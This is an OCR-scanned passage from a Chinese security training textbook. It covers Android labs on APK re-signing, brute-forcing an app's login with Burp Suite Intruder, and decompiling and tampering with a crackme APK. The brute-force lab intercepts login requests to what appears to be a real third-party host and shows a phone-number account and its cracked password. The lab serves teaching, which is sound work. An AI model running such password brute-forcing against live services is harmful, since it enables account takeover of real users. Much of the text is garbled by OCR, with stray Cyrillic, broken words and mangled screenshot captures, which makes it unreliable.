图 7-19 所 示 。 











тез 
图 AndroidManifestxml 
7] classes.dex 

[ | crackme0502.apk 

L] erackme0502 sign.apk 


[] resources.arsc 

















RRF жна EUR 
操作 : 
ОЕ ак О 重 打包 apk © 签名 spk О 提取 dex О іх ORB 
Овах О 重 打包 dex  Odedédàk O dex 转 txt O dex 转 jar O jar 转 dex 
ORCH O аиын О} Тј О etit 


日 志 : 


Android 逆 向 助手 v2.2 一 
选择 : 

源 文件 : [D: \test\erackme0502\ or ackme0502. apk жй... 
目标 文件 : [D:VtestlVerackne0502Verackne0502, si gn spk | 3 





签名 apk 
源 : D: VtestlVerackne0502 Vcr ackne0502. apk 
目标 : D;\test\crackme0502\ 





ckme0502_si gn. apk 














В 7-17 Android 逆向 助手 中 对 APK 文件 重新 进行 签名 操作 





(E 5554:test 


e crackme0502 


Do you want to uninstall this 
арр? 


Сапсе! 





图 7-18 ИЖИ) APK 文件 
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p HAM > 本 地 二 要 (Dj > test > 


m 


Я 
= AndroidManifest aml 

] dlasses.dex 

] crackme0502.apk 

] crackme0502 sign.apk 


C] resources.arsc 


步骤 13: 打开 该 APK 文件 ,直接 单 击 “ 


所 示 o 


crackme0502 





Custom 


В 7-19 ”安装 经 逆向 助手 处 理 后 的 APK 文件 


APPS WIDGETS 





W) 5554:test 











crackme0502 
获取 注解 
请 输入 注册 码 
检测 注册 码 





注册 码 正确 








图 7-20 注册 成 功 


Dev Settings 


仁 测 注册 码 ” 按 钮 ,提示 “注册 码 正 确 ” 














,如 图 7-20 
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7.3.4 任务 与 思 


在 移动 互联 网 安全 中 ,Android 的 安全 问题 尤为 突出 。 加 强 对 Android 系统 的 逆向 研 
究 , 是 实现 安全 管理 的 一 个 重要 方法 和 途径 。 其 中 ,Dalvik 虚拟 机 是 学 习 和 研究 Android Ж 
统 逆向 工程 时 常用 的 工具 。 

Dalvik 是 Google 公司 设计 的 用 于 Android 平台 的 虚拟 机 , 即 Dalvik VM。Dalvik 可 以 
支持 已 转换 为 . dex (Dalvik Executable) 格 式 的 Java 应 用 程序 的 运行 ,. dex 格式 是 专 为 
Dalvik 设计 的 一 种 压缩 格式 ,适合 内 存 和 处 理 器 速度 有 限 的 系统 。 

Dalvik 经 过 优化 ,允许 在 有 限 的 内 存 中 同时 运行 多 个 虚拟 机 的 实例 ,并 且 每 一 个 Dalvik 
应 用 都 作为 一 个 独立 的 Linux 进程 执行 。 独 立 的 进程 可 以 防止 在 虚拟 机 崩溃 时 所 有 程序 都 
被 关闭 。 

Dalvik VM 是 Android 平台 的 核心 组 成 部 分 之 一 。Dalvik VM 并 不 是 一 个 Java 虚拟 
机 ,因为 Dalvik VM 没有 遵循 Java 虚拟 机 规范 ,不 能 直接 执行 Java 的 Class 文件 ,使 用 的 是 
寄存 器 架构 而 不 是 Java 虚拟 机 中 常见 的 栈 架构 。 但 是 Dalvik VM 执行 的 . dex 文件 可 以 通 
过 Class 文件 转化 而 来 ,使 用 Java 语法 编写 应 用 程序 ,也 可 以 直接 使 用 大 部 分 的 Java 
API 等 。 

2014 年 6 月 25 H . Android L 正式 推出 。 与 早期 的 Android 相 比较 ,Android L 的 改动 
幅度 较 大 。 其 中 ,在 Android L 中 用 ART 代替 了 原来 使 用 的 Dalvik。Dalvik 是 一 个 基于 
JIT ust in time) 编 译 的 引擎 , 即 应 用 每 次 运行 时 都 需要 通过 JIT 编译 器 将 字 节 码 转换 为 机 
器 码 , 这 一 机 制 的 效率 并 不 高 。 使 用 Dalvik 存在 一 些 缺 点 ,所 以 从 Android 4. 4(Kitkat) JF 
始 引入 了 ART, 从 Android 5.0(Lollipop) 开 始 ART 全 面 取代 了 Dalvik。Android 7. 0 向 
ART 中 添加 了 一 个 JIT 编译 器 ,这 样 就 可 以 在 应 用 运行 时 持续 地 提高 其 性 能 。 








7.4 服务 端 漏洞 : 密码 找 回 逻辑 漏洞 检测 和 重 现 


7.4.1 预备 知识 : Android 模拟 器 


使 用 模拟 器 ,可 以 在 不 接 人 应 用 网 络 的 前 提 下 对 设备 的 各 项 性 能 进行 测试 和 调试 。 
AVD(Android Virtual Device, Android 虚拟 设备 ) 是 一 款 Android 模拟 器 工具 ,具有 硬件 配 
置 . 系 统 镜像 .屏幕 尺寸 .外观 、SD 卡 等 功能 。Android SDK(Software Development Kit, 软 件 开 
发 工具 包 ) 中 提供 了 АУР 模拟 器 ,可 以 在 计算 机 上 开发 和 测试 针对 Android 的 应 用 程序 。 

Android SDK 的 下 载 地 址 为 http://tools. android-studio. org/index. php/sdk。 下 载 
解压 后 ,可 以 找到 以 下 两 个 文件 。 

(1) SDK Manager。Android 软件 开发 工具 包 管 理 器 ,连接 本 地 和 服务 器 ,从 服务 器 下 
载 安 卓 开发 所 需要 的 工具 到 本 地 。 

(2) АУР Manager, Android 虚拟 驱动 管理 器 ,主要 用 来 创建 Android 模拟 器 。 
Android 模拟 器 所 需 的 镜像 通过 SDK Manager 来 下 载 ,而 АУР 则 通过 АУР Manager Ж 
创建 ,如 图 7-21 所 示 。 

另外 ,在 本 实验 中 还 需要 用 到 Burp Suite 工具 。Burp Suite 工具 是 用 于 攻击 Web 应 用 
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Android Virtual Device (AVD) Manager _ 口 X 
Tools 


Android Virtual Devices Device Definitions 

List of existing Android Virtual Devices located at C:\Users\Administrator\.android\avd 
а |а не es [анаан a [==] 

ГЇ] shaco Pho.. Android 7.0 TO 24 Intel Atom (86.64) Start. 



































A A repairable Android Virtual Device. X An Android Virtual Device that failed to load. Click 'Details' to see tl 





图 7-21 通过 AVD Manager 创建 AVD 


程序 的 集成 平台 , 它 提 供 了 多 种 功能 ,包括 请 求 的 拦截 和 修改 .扫描 Web 应 用 程序 漏洞 以 
暴力 破解 登录 表单 .执行 会 话 令 牌 等 。 有 关 Burp Suite 工具 的 介绍 可 见 6.1.1 节 的 内 容 。 


7.4.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 掌握 以 下 内 容 。 

(1) APP 在 登录 时 未 考虑 穷 举 密码 的 后 果 。 

(2) Burp Suite 工具 的 应 用 。 

(3) 在 登录 时 使 用 验证 码 或 令 牌 (token) 来 禁止 用 户 重 放 数据 。 

2. 实验 条 件 

本 实验 可 以 在 一 台 运 行 Windows XP 及 以 上 版 本 的 操作 系统 上 进行 。 同 时 ,还 需要 事 
先 安装 和 配置 Android 模拟 器 和 Burp Suite 工具 。 


7.4.3 实验 过 程 


步骤 1: 在 模拟 器 中 添加 APK 文件 。 暴 力 破 解 漏洞 , 则 是 恶意 攻击 者 使 用 正常 的 登录 
操作 ,采用 多 组 密码 来 枚 举 该 用 户 的 密码 操作 ,直到 枚 举 到 正确 密码 为 止 。 以 baji. арк 为 
例 (在 实验 中 读者 需要 事先 准备 一 个 APK 文件 ) ,用 adb install baji. apk 将 该 程序 安装 至 
AVD 模拟 器 中 (其 中 baji. apk 为 实验 中 使 用 的 APK 文件 的 文件 名 )。 成 功 安 装 后 的 界面 
如 图 7-22 所 示 。 

步骤 2: 设置 代理 。 因 为 在 运行 过 程 中 ,需要 截获 数据 包 并 进行 分 析 。 所 以 ,在 实验 用 
的 计算 机 上 需要 设置 代理 。 首 先 ,在 命令 提示 符 下 输入 “ipconfig” 命 令 查 看 本 地 计算 机 的 
IP 地 址 ,具体 为 192. 168. 4. 106 ,如 图 7-23 所 示 。 
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@ 5554:HelloWorid 


APPS WIDGETS 


LE 
Speech Widget 
Recorder Preview 





7-22 在 模拟 器 中 安装 APK 文件 


lili C\Windows\system32\cmd.exe 





图 7-23 查看 本 机 IP 地 址 
-NETWORKS— 





步骤 3. 切换 到 Android 模拟 器 ,然后 依次 选择 Settings > WIRELE 
More—Mobile networks — Access Point Names > T-Mobile US 选项 ,在 打开 对 话 框 的 


Proxy 和 Port 处 分 别 输入 代理 的 IP 地 址 192. 168. 4. 106 和 系统 默认 的 端口 号 8080, 如 


图 7-24 所 示 。 
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Name 
T-Mobile US 


APN 


epc.tmobile.com 


Proxy 
192.168.4.106 


Port 
8080 


Username 
none 





图 7-24 设置 Proxy 和 Port 


步骤 4: 然后 打开 Burp Suite, Æ Burp Suite 界面 的 Proxy 选项 卡 中 设置 代理 服务 器 ， 
单 击 Options 标签 , 单 击 Add 按钮 iH I“ Add a new proxy listener”( 添 加 新 的 代理 监听 ) 窗 
口 ,在 Bind to port 中 输入 “8080”, 选 中 Specific address 复 选 框 ,在 其 下 拉 列 表 中 选择 


192. 168. 4. 106 选项 ,如 图 7-25 所 示 。 然 后 , 单 击 OK 按钮 进行 确认 。 














Вир intruder Repeater 





Target | Proxy. | Spider | Scanner | intruder | Repeater | Sequencer | Decoder | comparer | Extender | Project optons | user options | Alerts | 











tercept | HTTP history | WebSockets nstory | Optons 

















Ф) Proxy 
ue 
СЛ Вигр Proxy uses listeners to (Coming HTTP requests from your browser. You will need to configure your browser to use one of the listeners as 

Сам ] Running | interface Invisible | Redirect Certificate 

@ 127.0.0.1:8080 о Per-host 
Edit. 
=: Ki Add a new proxy listener 
Remove. /— 
— Binding, | Request handing | Certtcate | 
Qj These settings control how Burp binds the proxy istener. 
Each installation of Burp| Bindtoport | 80800 — 


another patataton of Bi 
J oia en 
impot Teapot СА 
= | Ө Annieraces 


© Specific address: | 1921684106 М 








图 7-25 设置 burp suite 的 proxy 功能 


步骤 5: 选择 Intercept 选项 卡 , 单 击 Intercept is off( 关 闭 拦 截 ) 按 钮 将 其 变 成 Intercept 
is on( 打 开 拦 截 ) 按 钮 ,如 图 7-26 所 示 ,等 待 数据 包 通 过 。 
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E Burp Suite Professional v1.7.26 - Temporary Project - licensed to Larry Lau - Unlimited by mxcx@fo 

















В 7-26 设置 为 intercept is on 状态 


步骤 6: 切换 到 Android 模拟 器 ,进入 靶 机 演示 程序 ,输入 需要 进行 暴力 破解 的 用 户 名 


(如 13312312302) 和 密码 (随意 设置 ) ,然后 单 击 登 录 ” 按 钮 ,Burp Suite 截取 到 的 登录 数据 
包 如 图 7-27 所 示 。 
































靶 机 演示 






е 
serie: at/ 4.1 


'etientrrpe" android". "авиа" 71^, "anerLont nume": "1331 232302", "алеге 70222027, аша? ^ 











图 7-27 Burp Suite 截取 到 的 登录 数据 包 


步骤 7: 然后 将 该 数据 包 发 送 到 Intruder 功能 上 。 在 数据 包 区 域 右 击 ,在 出 现 的 快捷 菜 
单 中 选择 Send to intruder 选项 或 按 Ctrl 十 1 组 合 键 , 如 图 7-28 所 示 。 





Request to http./183.62.167 22-1080 
[orem )[ о» ) шшш] л= J 


= 

[POST /app/userLogin. do?clientType=androidËzoneId=0Ë&userId=lËuuid=f#ffff##-c994-6fbc-3b80-a03229514f41-HUAVEIW20NLA-AL10-4.4 7-19 HTTP/1 1 
|ассер?: application/ison 

[уе?етет: http: //nxa. jiayitone. com cn 

ien/ison: charset=UTF-8 








Comment this ite 








во 
|user-Acent: okhttp/3.4. 1 





{"clientType": "android", "userTd^: "1", "usezLorinlame": "| 


Zuid”: "EHEEEEEF- c89d-Gfbc- 3b80-803229514141-HUATET 
[п4-4110-4.4. 2-18", "zone": "0"] 














图 7-28 ”将 该 数据 包 发 送 到 intruder 功能 上 
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步骤 8: 在 Intruder 选项 卡 中 ,打开 Positions 选项 卡 , 先 单 击 右边 的 Clear $ 按钮 将 所 
有 的 变量 清除 ,如 图 7-29 所 示 。 












































Target | Proxy | Spider | Scanner ‘Repeater | Sequencer | Decoder | Comparer | Extender | Projectoptions | User options | Alerts. 
An 
Target Payloads | optons 
图 "vd Positions титр 
Cont the positions where paybads wil be inserted nto the base request The attack type determines the way in which payloads are assigned to payload positions - 
see jo tor tul деш. 
Atta ype | Sniper in 
[Post Jps/aseriogin.dosclieniTzpesandsoi dizonet de uses de Iuni АЕРА Efbc- 3080n 031295 MEA I-RUATETRZUNLA-ALID-d 4 2-1. Га 
Ana = 
ЕСП 
Auto $ 
— 
uuid”: ffffffff-c994-6fFbc-3b80-a032295 








图 7-29 消除 所 有 变量 


步骤 9: 然后 选取 输入 密码 段 ( 本 实验 为 “222222”) , 单 击 右边 的 Add $ 按钮 ,将 该 密码 
字段 设置 为 一 个 变量 ,如 图 7-30 所 示 。 








Payload Positions Start attack 


Configure the postions where payloads wil be inserted into the base request. The attack type determines the way in which payloads are assigned to payload postions - 












See help for full details 
Attack type: | Sniper. 
[POST /арр/\ n. do?clientTypemandroi ёЁзопе1д=бёззет1д= Шш d-ffffffff-c99d-6fbc-3b80-a03229514f41-HUARETWZONLA-AL10-4, 4 " 
TP/ 
Асе json 
Con 
ев tp: //nxa. jiayitong сов. en 
Con: e. application/json: charsetsUTF-8 
Con: 
os: 1080 
e 41 








elientTyper: "android", "userId": "17, "userloginName”: 13312317302", "usexPasseord": "ШЕШЕН, "uni d". -ttttttt-c994-6fbe-3bs0-a03 
2951441-HUATEI NLA-AL10-4.4 2-19 "zoneTd "0" 














图 7-30 将 密码 字段 设置 为 一 个 变量 


步骤 10: 然后 在 Payloads 选项 卡 中 ,选择 需要 进行 暴力 破解 的 字典 ,如 图 7-31 Bros 。 

步 又 11: 然后 根据 暴力 破解 设置 相应 的 线程 数 和 并 发 数 , 如 图 7-32 所 示 。 单 击 Start 
attack 按钮 ,开始 进行 暴力 破解 攻击 。 

步骤 12: 等 待 一 段 时 间 , 单 击 Results 标签 ,如 果 枚 举 到 了 正确 的 用 户 名 和 密码 ,将 会 
显示 在 中 间 的 列表 框 中 。 本 实验 中 , 枚 举 到 的 正确 的 密码 是 123456 (与 实验 当时 账号 实际 
密码 一 致 ) ,如 图 7-33 所 示 。 


7.4.4 任务 与 思考 


在 智能 移动 终端 密码 找 回 过 程 中 可 能 出 现 以 下 现象 。 
CD. 密码 找 回 凭证 太 弱 ,容易 被 暴力 破解 。 
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(2) Рауіо Sets 
Ye п define one or more payload sets. The number of payload sets depends on the attack type defined n the Positions tab. Various payload types are available fd 
payload set, and each payload type can be customized in different ways. 


Payoadset [1 __ ж Payload count: 23,394 
еме [е Renes comt ao 





Í@) Payload Options [Simple list] 
This payload type lets you configure a simple list of strings that are used as payloads. 


























图 7-31 选择 暴力 破解 使 用 的 字典 





T 


Target | postions | онь [pe 


图 Request Headers (start attack) 


(9) Tese setings control whether intruder updates the configured request headers durng atacis. 
@ Update Content-Length header. 
@ Set Connecton: сюзе 


@) Request Engine 
@ Tree seringe conrei te engine used for making HTTP requests when performing эшо. 











Number of threads: 25 — 
— 
I 
Throttle (miliseconds). @ Fixed ° 

= с 








© Varabie: start [0 мер |20000 
图 7-32 设置 相应 的 线程 数 和 并 发 数 


(2) 密码 找 回 凭证 可 以 从 客户 端 \URL 中 直接 获取 。 

(3) 密码 找 回 凭证 可 以 在 网 页 源 代 码 中 直接 获取 。 

(4) 密码 找 回 的 邮箱 链接 易 猜 解 ,如 对 应 时 间 的 md5 值 等 。 

(5) 密码 找 回 的 手机 或 邮箱 从 页 面 获取 ,可 以 通过 Firebug 修改 。 其 中 ,Firebug 是 
Mozilla Firefox 下 的 一 款 开 发 类 扩展 , 它 包括 HTML 查看 和 编辑 、JavaScript 控制 台 、 网 络 
状况 监视 器 等 功能 ,是 开发 JavaScript、CSS、HTML 和 Ajax 的 有 效 工 具 。 通 过 Firebug ,还 
可 以 从 各 个 不 同 角 度 剖 析 Web 页 面 内 部 的 细节 层面 ,给 Web 开发 者 带 来 便利 。 

(6) 最 后 提交 新 密码 时 的 修改 用 户 ID 为 其 他 ID。 
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Ki intruder attack 1 _ 











Fiter: Showing all tems 











T 
ii 
ЫШ 

i 


"vu 
БЕ 


38888888E 
becccoococoDs 
cococcccoocBll 











[POST /app/userLogin doTclientI;pecandroi disons deDbusezTde liuni ЕЕРЕЕ he SbB0-4032285 MEA I- RLAVEIW2UNLA-ALIO-4 4 2-18 


TP/L 1 
Accept: application/json 


User-Agent: ol 


cli entTrpe": "android", “userId”: "1”, "userLoginlame”:”13312312302", "usezPassword": "125456", “uuid”: "fFfffEff-c99d-6fbe-3b80-103229514£ 


AI-UATEI WLA-AL10-4. 4. 2-19", "zoneId". 707) 





(29 БӘ (699) [>J [rea searen em 


тизм p— — —————ÉMÓwÀ-—————1 


图 7-33 显示 已 被 暴力 破解 的 用 户 名 (手机 号 码 ) 和 密码 


7.5 反 编译 、 自 改 漏洞 检测 和 重 现 


7.5.1 预备 知识 : 反 编译 





0 matches. 





ЕК UE SE [8] T£ CReverse Engineering) 也 称 为 计算 机 软件 还 原 工 程 , 是 指 通过 对 
他 人 软件 的 目标 程序 (如 可 执行 程序 ) 进 行 逆向 分 析 工 作 , 以 推导 出 他 人 的 软件 产品 所 使 用 
的 思路 ,原理 ,结构 、 算 法、 处 理 过 程 运 行 方法 等 设计 要 素 , 某 些 特定 情况 下 可 能 推导 出 源 


代码 。 


反 编译 漏洞 是 因为 APP 在 开发 完成 后 ,未 进行 任何 加 固 措施 而 导致 恶意 攻击 者 可 以 查 


看 该 APP 的 运行 流程 。 算 改 漏洞 是 因为 APP 在 开发 完成 后 ,未 进行 任何 加 
恶意 攻击 者 可 以 在 该 APP 的 基础 上 任意 修改 任何 文件 ,如 重新 签名 和 发 布 。 
反 编 译 漏洞 的 流程 以 APK 为 例 。 


7.5.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,要 求 读者 主要 掌握 以 下 内 容 。 





固 措 施 而 导致 
本 实验 中 检测 
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(1) APP 程序 的 反 编译 和 自 改 漏洞 的 检测 和 重 现 方法 。 

(2) 如 何 使 用 加 固 方案 对 APK 进行 加 固 , 防 止 二 次 打包 。 

2. 实验 条 件 

本 实验 在 一 台 运 行 Windows XP 及 以 上 版 本 的 操作 系统 上 进行 ,在 具体 实验 之 前 ,需要 
安装 “ 安 卓 道 向 助手 ”和 “APK 改 之 理 (APK IDE)” 两 款 工 具 软 件 。 


7.5.3 实验 过 程 


步骤 1: 打开 Android 逆向 助手 ,选中 “dex 转 jar” 单 选 按钮 ,然后 将 需要 进行 逆向 分 析 
的 APP( 需 要 在 实验 前 准备 好 ,本 实验 中 使 用 的 文件 名 为 crackme02. apk) 导 入 程序 源 文件 ， 
从 该 java 代码 中 可 以 很 清楚 地 看 到 程序 的 运行 流程 ,如 图 7-34 所 示 。 如 果 需 要 对 该 代码 进 
行 修 改 , 需 要 更 改 smali 代码 。 














7-34 将 APP 导入 程序 源 文件 


步骤 2. 重 现 算 改 漏洞 。 首 先 对 其 中 的 某 个 字段 进行 算 改 ,将 其 安装 到 虚拟 机 ,具体 命 
令 为 “adb install crackme02. apk”( 其 中 crackme02. apk 为 本 实验 中 使 用 的 АРК 文件 的 文 
件 名 ) ,如 图 7-35 所 示 。 

步骤 3: 运行 该 АРК 文件 后 ,直接 单 击 “ 注 册 ” 按 钮 ,系统 提示 “无 效用 户 名 或 注册 码 ”， 
如 图 7-36 所 示 。 

步骤 4; 切换 到 “APK 改 之 理 ” 界 面 ,将 该 APP Л “АРК 改 之 理 ”" 程 序 中 ,并 打开 
Androidmanifest. xml 文件 ,如 图 7-37 所 示 。 其 中 ,“APK 改 之 理 ? 是 一 款 可 视 化 的 集 АРК 
Б. АРК Æ FE JI 95 t 3L АРК 调试 分 析 、APK 打包 、APK 签名 为 一 体 的 Android 
APK 反 汇 编 工 具 , 简 化 了 APK 修改 过 程 中 的 烦琐 操作 。 

步骤 5: 打开 /res/values/strings. xml 找到 “注册 ”按钮 对 应 的 字段 ,将 其 对 应 的 信息 修 
改 为 “无 效用 户 名 或 注册 码 , 哼 哼哈 嘿 ”, 然 后 保存 ,如 图 7-38 所 示 。 

步骤 6. 选择 “编译 ”>“ 重 新 生成 Apk” 选 项 ,对 刚才 被 修改 后 的 APK 进行 二 次 打包 ， 
如 图 7-39 所 示 。 








276 


网 络 攻击 与 防御 实 训 











Basic Controls 


API Demos Browser Calculator Calendar 


Hardware Keyboard not enabled 
Use on screen keyboard 


т © M 


Camera Clock Crackme010 Crackme020 
1 


E CAWindows\system32\cmd.exe 


图 7-35 crackme02. арк 安装 到 虚拟 机 





W) 5554:test 





Android 程 序 破解 演示 实例 Pa 
meg: | 请 输入 用 户 名 
“Š 
注册 码 : ， 请 输入 16 位 的 注册 码 vi 
注册 








无 效用 户 名 或 注册 码 


В 7-36 单 击 “ 注 册 ” 后 出 现 的 提示 信息 
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JO SD SF АВ AIV IRD mG эзы “smo 
HaBniag^cnhd3i «e `... 
«| Sturt java * адна бон sl oietiviy эш] 
Vim versione." encoding" 
Vapplication andcoid:debuggablee 
vactivity androidilabelu"i 
inten есет 
action asdroidimameu* 
Category endroidiname- 
«jinsent filer» 
c/accivicy> 
«application 
амале» 













Bess sai 
B waisketirisdi. wa 
国 miwetivriy mai 
国 sete wai 
E| Misa mali 
E мама mali 








图 7-37 将 АРК 文件 导入 “APK 改 之 理工 具 





Ф APKM 之 理 3.1.0.0 
TAG SHO SFW ADB ШЕУ IAD RES) SPR) мїн 





































CEEE d Q B a 4 & TIAI AGE we - 
[3 юн < | * Start. ўна Androi Mani fest. xal | Wainhotivity swali x strings xnl | 
= 7" 1 — <?aml versions encodinge"utf-8"3» 
Veri 2 Б <гезошгсев> 
'ackage: con. droi der, cr ackms0201 3 <string name="app_name">Crackme0201</string> 
E H string name="menu sectings"»Settingsc/string» 
= 5 <string ivity main"»Crackme0201c/string» 
a @ё+#ехх H раны on5Androzg 径 序 破解 演示 实例 </arring> 
8-00 con. droider. erackne0201 ^ 了 «string ame"> 用 户 名 : </string> 
Дек Mani fest xnl 8 «string name="san"> 注 册 码 : </string> 
чөй. yel B «string "> 注 册 </string> 
BY original 10 <string sername"> 请 输入 用 户 名 </string> 
Ө 1 <string > 请 输入 16 位 的 注册 码 </scring> 
E dri echdpiri 12 «string g: > 程序 未 注册 </string> 
O drariblacldpi-st 1з <string > 程序 已 注册 </string> 
E drarablemdpi va 14 <string eased> 无 效用 户 名 或 注册 码 , 哼 哼哈 嘿 ! </string> 
由 全 drerablexhápi t 15 «string name="successed"> 蒂 喜 您 ! 注册 成 功 </acring> 
E layout 16 </resources> 
EZ 
人 局 values-large-và. 
© mdi 














图 7-38 将 “注册 ” 按 钮 对 应 的 字段 信息 改 为 “无 效用 户 名 或 注册 码 , 哼 哼哈 嘿 ” 





988) | ADB REV IAM RHS Әз) MEO) 
юе n ui ss -0a 
t Замер Andrei Mani fest xnl |” Mainhetivi ty. smali X strings. zal | 

























<?хв1 version="1.0" encoding="utf-5"?> 
<resources> 
«string app name"»Crackme0201«/string» 















«string s"»Seztingsc/string» 
string Y "»Crackme0201«/string» 
«string ">Android 程 序 破解 演示 实例 </string> 
<string "> 用 户 名 ，</atring> 


"> 注册 码 ，</string> 


<arring 








<atring > 注 册 </string> 
«string ame"> 请 输入 用 户 名 </string> 
«string > 请 输入 16 位 的 注册 码 </satring> 


| H амаар 12 «string 
Сане їз <string 


> 程序 未 注册 </string> 
"> 程序 已 注册 </string> 





























| GEO фанаа 14 <string edr> 无 效用 户 名 或 注册 码 , 呼 哼哈 嘿 ! </string> 
BE rabl едра 15 «string OSEE! 注册 成 功 </satring> 
| WC layout. 16 «/resources» 
17 
Ma"! Ж! IBTTFEHERERIESUESRNGAR - 
вене Nd 
| ае чча Иш 
bea mdi йк АЫ үч Чы е ыар бойрык sss 
prom 
= «= 
L Pana ШЕР ЁН NS 2 IRE BEREE WpkTDE_erackee02. apk 
EE стасаат 











图 7-39 重新 生成 APK 
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步骤 7: 重新 生成 APK 文件 后 ,在 Android 模拟 器 中 删除 之 前 安装 的 АРК 文件 ， 
如 图 7-40 所 示 。 











рю нея 






e Crackme0201 


Do you want to uninstall this 
app? 


Cancel 


7-40 删除 之 前 安装 的 APK 文件 


步骤 8: 然后 安装 重新 生成 的 APK 文件 (ApkIDE_crackme02. apk) ,具体 命令 为 “adb 
install ApkIDE_crackme02. apk”, 如 图 7-41 所 示 。 





r 
== 
° © © AaBbC AaBbC 


APPS WIDGETS Hardware Buttons эш Б 


ылы 
п Э @ 
"ai 


API Demos Browser Calculator Calendar 


О Г Ө 


ес 





Hardware Keyboard not ensbied in AVD 
Use on screen keyboard 





Camera Clock Crackme010 Crackme020 








图 7-41 安装 重新 生成 的 APK 文件 
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步骤 9: 进入 该 APK ,然后 单 击 “注册 ?按钮 ,出 现 自 改 后 的 APK 信息 “无 效用 户 名 或 注 
册 码 , 哼 哼 哈 嘿 ”, 如 图 7-42 所 示 。 





Ж) 5554:test 


Android 程 序 破解 演示 实例 
用 户 名 : | 请 输入 用 户 名 


注册 码 : “ 请 输入 16 位 的 注册 码 


注 
Bz 


无 效用 户 名 或 注册 码 , 哼 哼哈 嘿 ! 





图 7-42 显示 被 篡改 的 信息 


7.5.4 任务 与 思考 


Android SDK 中 包含 了 一 个 用 于 优化 APK 的 新 工具 zipalign, 它 提高 了 优化 后 的 APP 
与 Android 系统 的 交互 效率 ,从 而 可 以 使 整个 系统 的 运行 速度 有 了 较 大 的 提升 。Android 
小 组 建议 开发 者 在 发 布 新 APP 之 前 使 用 zipalign 优化 工具 ,而 且 对 于 已 经 发 布 但 不 受 限 于 
系统 版 本 的 APP ,建议 用 优化 后 的 APK 替换 现 有 的 版 本 。 

读者 可 在 本 实验 的 基础 上 ,结合 zipalign 工具 的 文档 说 明 , 通 过 具体 实验 掌握 zipalign 


的 使 用 方法 。 








图 书 资 源 支 持 











感谢 您 一 直 以 来 对 清 




















提供 配套 的 资源 ,有 需求 的 读者 请 扫描 下 方 的 “ 书 圈 " 微 信 公 


书 专区 下 载 ,也 可 以 拨打 上 
如 果 您 在 使 用 本 书 的 

































































华 版 图 书 的 支持 和 爱护 。 为 了 配合 本 书 的 使 用 ,本 书 
众 号 二 维 码 , 在 图 














电话 或 发 送 电子 邮件 咨询 。 
过 程 中 遇 到 了 什么 问题 ,或 者 有 相关 图 

















出 版 计划 ， 














也 请 您 发 邮件 告诉 我 们 ,以 便 我 们 更 好 地 为 您 服务 


我 们 的 联系 方式 : 
地 Ж. 北京 海淀 


邮 编 : 100084 





资源 下 载 : http://www. tup. com. cn 








电 话 : 010— 62770175 — 4604 


电子 邮件 : weijj tup. tsinghua. edu. сп 





区 双 清 路 学 研 大 厦 A 座 707 


кн а 





ОО: 883604( 请 写 明 您 的 单位 和 姓名 ) 


用 微 信 扫 一 扫 右 边 的 二 





维 码 , 即 可 关注 清华 大 学 出 版 社 公众 号 “ 书 圈 ”。 


